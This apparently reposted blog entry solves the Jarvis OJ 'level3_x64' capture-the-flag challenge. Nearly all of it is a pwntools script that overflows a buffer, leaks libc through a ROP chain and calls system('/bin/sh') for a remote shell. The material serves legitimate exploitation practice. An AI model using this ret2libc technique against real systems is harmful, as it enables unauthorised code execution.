Jarvis OJ-Level3-x64
阅读原文时间:2023年07月12日阅读:1

linux64位ROP技术

#!/usr/bin/env python
from pwn import *

elf = ELF('level3_x64')
Io = remote('pwn2.jarvisoj.com',9883) #pwn2.jarvisoj.com 9883

got_write = elf.got['write']
main = elf.symbols['main']
plt_write = elf.symbols['write']

payload1 = "\x00"* (0x80 + 8)
payload1 += p64(0x00000000004006b3) #pop rdi ; ret
payload1 += p64(1)
payload1 += p64(0x00000000004006b1) #pop rsi ; pop r15 ; ret
payload1 += p64(got_write)
payload1 += p64(1)
payload1 += p64(plt_write)
payload1 += p64(main)

Io.recvuntil("Input:\n")
Io.send(payload1)
temp = Io.recv(8)
write_addr = u64(temp[0:8])

write_libc_address = 0x00000000000eb700 #readelf -a ./libc-2.19.so | grep " write@"
bin_sh_libc_address = 0x17c8c3 #strings -a -t x libc-2.19.so | grep "/bin/sh"
system_libc_address = 0x0000000000046590 #readelf -a ./libc-2.19.so | grep " system@"
exit_libc_address = 0x000000000003c1e0 #readelf -a ./libc-2.19.so | grep " exit@"

offset = write_addr - write_libc_address

bin_sh_address = offset + bin_sh_libc_address
system_address = offset + system_libc_address
exit_address = offset + exit_libc_address

payload = "\x00"* (0x80 + 8)
payload += p64(0x00000000004006b3) # pop rdi;ret #ROPgadget --binary ./level3_x64 --only "pop|ret"
payload += p64(bin_sh_address) # /bin/sh ; argv for system()
payload += p64(system_address) # address of system()
payload += p64(exit_address)

Io.send(payload)
Io.interactive()

  好菜啊,至今用不出通用gadgets。继续加油                                                                                                     .

手机扫一扫

移动阅读更方便

阿里云服务器
腾讯云服务器
七牛云服务器

你可能感兴趣的文章